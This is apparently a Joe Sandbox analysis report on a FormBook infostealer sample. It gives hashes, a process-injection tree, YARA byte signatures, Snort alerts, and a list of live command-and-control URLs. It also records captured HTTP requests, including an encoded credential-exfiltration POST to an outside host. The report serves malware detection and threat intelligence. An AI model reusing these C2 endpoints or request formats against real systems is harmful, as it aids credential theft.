Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
Analysis ID:830750
MD5:c7714b273571ba64c0b77afca236ac6d
SHA1:c24d9460bee8a724abe8b0dcf3d74851dd5737ed
SHA256:e62c1e809c48e66104c34ae3e977b82fbea2e984dee708bda431b608c2774c28
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe (PID: 5020 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe MD5: C7714B273571BA64C0B77AFCA236AC6D)
    • vfpbkeeo.exe (PID: 1316 cmdline: "C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m MD5: 6D30D26416D626447BA4298A59111F6D)
      • conhost.exe (PID: 1240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • vfpbkeeo.exe (PID: 1948 cmdline: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe MD5: 6D30D26416D626447BA4298A59111F6D)
        • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • cmd.exe (PID: 916 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1f0e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x182f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x180f5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17b91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x181f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1836f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xaa1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1de87:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ee3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1f0e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x182f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.vfpbkeeo.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        3.2.vfpbkeeo.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x20103:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbe72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1931a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        3.2.vfpbkeeo.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19118:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18bb4:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x1921a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x19392:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xba3d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17dff:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1eeaa:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1fe5d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.vfpbkeeo.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.vfpbkeeo.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x20f03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xcc72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1a11a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.491.195.240.9449702802031449 03/20/23-17:00:09.343542
          SID:2031449
          Source Port:49702
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.481.17.18.19849706802031412 03/20/23-17:00:25.955923
          SID:2031412
          Source Port:49706
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.481.17.18.19849706802031453 03/20/23-17:00:25.955923
          SID:2031453
          Source Port:49706
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.494.176.104.8649696802031453 03/20/23-16:59:46.201874
          SID:2031453
          Source Port:49696
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.491.195.240.9449702802031453 03/20/23-17:00:09.343542
          SID:2031453
          Source Port:49702
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.494.176.104.8649696802031412 03/20/23-16:59:46.201874
          SID:2031412
          Source Port:49696
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.491.195.240.9449702802031412 03/20/23-17:00:09.343542
          SID:2031412
          Source Port:49702
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.494.176.104.8649696802031449 03/20/23-16:59:46.201874
          SID:2031449
          Source Port:49696
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.481.17.18.19849706802031449 03/20/23-17:00:25.955923
          SID:2031449
          Source Port:49706
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeReversingLabs: Detection: 42%
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeVirustotal: Detection: 42%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.energyservicestation.com/u2kb/?pJ=y0bMVGhK3R&s7=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuNRicmmGgsJT37Uw==Avira URL Cloud: Label: malware
          Source: http://www.avisrezervee.com/u2kb/www.avisrezervee.comAvira URL Cloud: Label: malware
          Source: http://www.thedivinerudraksha.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.gritslab.com/u2kb/www.gritslab.comAvira URL Cloud: Label: malware
          Source: http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.ukAvira URL Cloud: Label: malware
          Source: http://www.white-hat.uk/u2kb/www.white-hat.ukAvira URL Cloud: Label: malware
          Source: http://thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lAvira URL Cloud: Label: malware
          Source: http://www.bitservicesltd.com/u2kb/?pJ=y0bMVGhK3R&s7=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7Wl2JIBHu0WW9vDmQ==Avira URL Cloud: Label: malware
          Source: http://www.thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pi0eI0K5lBX7KNLg==Avira URL Cloud: Label: malware
          Source: http://www.energyservicestation.com/u2kb/www.energyservicestation.comAvira URL Cloud: Label: malware
          Source: http://www.un-object.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.energyservicestation.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.younrock.com/u2kb/?s7=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKq8rTPQW1vWIa2Wug==&pJ=y0bMVGhK3RAvira URL Cloud: Label: malware
          Source: http://www.thewildphotographer.co.uk/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.white-hat.uk/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.bitservicesltd.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.fclaimrewardccpointq.shop/u2kb/www.fclaimrewardccpointq.shopAvira URL Cloud: Label: malware
          Source: http://www.222ambking.org/u2kb/www.222ambking.orgAvira URL Cloud: Label: malware
          Source: http://www.gritslab.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.fclaimrewardccpointq.shop/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.gritslab.com/u2kb/?s7=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZjx8zjtO3/lmb0Gg==&pJ=y0bMVGhK3RAvira URL Cloud: Label: malware
          Source: http://www.younrock.com/u2kb/?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cAvira URL Cloud: Label: malware
          Source: http://www.shapshit.xyz/u2kb/?s7=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBtiTAOJDfFAse6Fg==&pJ=y0bMVGhK3RAvira URL Cloud: Label: malware
          Source: http://www.un-object.com/u2kb/?pJ=y0bMVGhK3R&s7=pRDkJdNDOVoQCU+9NHQShuJ8RlIM2fjCZpxzdvjpnmqfDHzh6n+FGyromdVZx0/+Z3ctR0ZwX+ep4hJ0NBR+2QmcJmTx4hb/kQ==Avira URL Cloud: Label: malware
          Source: http://www.un-object.com/u2kb/www.un-object.comAvira URL Cloud: Label: malware
          Source: http://white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfrAvira URL Cloud: Label: malware
          Source: http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.comAvira URL Cloud: Label: malware
          Source: http://www.fclaimrewardccpointq.shopAvira URL Cloud: Label: malware
          Source: http://www.white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3tklxZoaLCmex8cw==Avira URL Cloud: Label: malware
          Source: http://www.shapshit.xyz/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.ecomofietsen.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.avisrezervee.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.germanreps.com/u2kb/www.germanreps.comAvira URL Cloud: Label: malware
          Source: http://www.younrock.com/u2kb/www.younrock.comAvira URL Cloud: Label: malware
          Source: http://www.222ambking.org/u2kb/?s7=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUesQZcBXW4MNpIrrg==&pJ=y0bMVGhK3RAvira URL Cloud: Label: malware
          Source: http://www.germanreps.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.222ambking.org/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.shapshit.xyz/u2kb/www.shapshit.xyzAvira URL Cloud: Label: malware
          Source: http://www.younrock.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.ecomofietsen.com/u2kb/www.ecomofietsen.comAvira URL Cloud: Label: malware
          Source: http://www.bitservicesltd.com/u2kb/www.bitservicesltd.comAvira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeReversingLabs: Detection: 38%
          Machine Learning detection for sample
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeJoe Sandbox ML: detected
          Source: 3.2.vfpbkeeo.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.vfpbkeeo.exe.2080000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: vfpbkeeo.exe, 00000001.00000003.309270547.000000001A050000.00000004.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000001.00000003.309553217.0000000019EC0000.00000004.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000003.314888267.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000A9F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.351980250.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.353912435.000000000356E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.000000000381F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.0000000003700000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdbUGP source: vfpbkeeo.exe, 00000003.00000002.353773506.0000000002670000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: vfpbkeeo.exe, vfpbkeeo.exe, 00000003.00000003.314888267.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000A9F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.351980250.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.353912435.000000000356E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.000000000381F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.0000000003700000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdb source: vfpbkeeo.exe, 00000003.00000002.353773506.0000000002670000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_0040290B FindFirstFileW,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_004089B8 FindFirstFileExW,

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 85.187.128.34 80
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.94 80
          Source: C:\Windows\explorer.exeNetwork Connect: 45.33.30.197 80
          Source: C:\Windows\explorer.exeDomain query: www.un-object.com
          Source: C:\Windows\explorer.exeDomain query: www.energyservicestation.com
          Source: C:\Windows\explorer.exeNetwork Connect: 78.141.192.145 80
          Source: C:\Windows\explorer.exeDomain query: www.white-hat.uk
          Source: C:\Windows\explorer.exeDomain query: www.thewildphotographer.co.uk
          Source: C:\Windows\explorer.exeDomain query: www.shapshit.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.18.198 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.17.12 80
          Source: C:\Windows\explorer.exeDomain query: www.thedivinerudraksha.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.192.30.147 80
          Source: C:\Windows\explorer.exeDomain query: www.bitservicesltd.com
          Source: C:\Windows\explorer.exeDomain query: www.younrock.com
          Source: C:\Windows\explorer.exeDomain query: www.gritslab.com
          Source: C:\Windows\explorer.exeNetwork Connect: 161.97.163.8 80
          Source: C:\Windows\explorer.exeDomain query: www.222ambking.org
          Source: C:\Windows\explorer.exeDomain query: www.fclaimrewardccpointq.shop
          Source: C:\Windows\explorer.exeNetwork Connect: 94.176.104.86 80
          Source: C:\Windows\explorer.exeNetwork Connect: 213.145.228.111 80
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49696 -> 94.176.104.86:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49696 -> 94.176.104.86:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49696 -> 94.176.104.86:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49702 -> 91.195.240.94:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49702 -> 91.195.240.94:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49702 -> 91.195.240.94:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49706 -> 81.17.18.198:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49706 -> 81.17.18.198:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49706 -> 81.17.18.198:80
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.shapshit.xyz
          Source: Joe Sandbox ViewASN Name: A2HOSTINGUS A2HOSTINGUS
          Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
          Source: global trafficHTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3tklxZoaLCmex8cw== HTTP/1.1Host: www.white-hat.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?s7=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZjx8zjtO3/lmb0Gg==&pJ=y0bMVGhK3R HTTP/1.1Host: www.gritslab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7Wl2JIBHu0WW9vDmQ== HTTP/1.1Host: www.bitservicesltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?s7=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUesQZcBXW4MNpIrrg==&pJ=y0bMVGhK3R HTTP/1.1Host: www.222ambking.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuNRicmmGgsJT37Uw== HTTP/1.1Host: www.energyservicestation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?s7=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKq8rTPQW1vWIa2Wug==&pJ=y0bMVGhK3R HTTP/1.1Host: www.younrock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=pn+zaWXo7szcfRSxpZYFMSllMpP2ulP+x3705F5u21IqvN9WG9kcUa2nxvPm1UX5MTo8dUhpuHauDgBRPTa7tLWBUGjKVRCVBQ== HTTP/1.1Host: www.thewildphotographer.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?s7=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBtiTAOJDfFAse6Fg==&pJ=y0bMVGhK3R HTTP/1.1Host: www.shapshit.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pi0eI0K5lBX7KNLg== HTTP/1.1Host: www.thedivinerudraksha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=pRDkJdNDOVoQCU+9NHQShuJ8RlIM2fjCZpxzdvjpnmqfDHzh6n+FGyromdVZx0/+Z3ctR0ZwX+ep4hJ0NBR+2QmcJmTx4hb/kQ== HTTP/1.1Host: www.un-object.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 85.187.128.34 85.187.128.34
          Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.gritslab.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.gritslab.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gritslab.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 28 66 71 54 47 58 66 5f 6b 4e 50 63 28 71 42 41 48 34 79 65 65 47 71 37 51 76 76 30 28 4b 48 6e 55 46 49 79 6f 36 46 44 47 79 4f 78 31 52 43 64 68 42 69 47 5a 54 69 70 36 4d 43 78 41 63 47 79 67 38 32 47 4b 76 51 30 79 71 62 56 46 4d 4f 67 5a 46 52 4d 6a 4a 7e 30 73 66 28 38 7a 79 58 7a 66 6e 39 50 4a 59 77 36 54 47 71 44 36 43 4e 68 44 53 6d 4f 36 4a 42 39 58 68 68 45 7a 70 39 37 45 71 79 67 43 70 6c 45 44 6a 74 62 50 61 61 41 41 54 74 76 34 66 34 75 37 70 38 65 72 6f 7a 68 30 45 50 6d 71 51 64 56 7e 6e 34 49 4a 41 62 6a 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=(fqTGXf_kNPc(qBAH4yeeGq7Qvv0(KHnUFIyo6FDGyOx1RCdhBiGZTip6MCxAcGyg82GKvQ0yqbVFMOgZFRMjJ~0sf(8zyXzfn9PJYw6TGqD6CNhDSmO6JB9XhhEzp97EqygCplEDjtbPaaAATtv4f4u7p8erozh0EPmqQdV~n4IJAbjng).
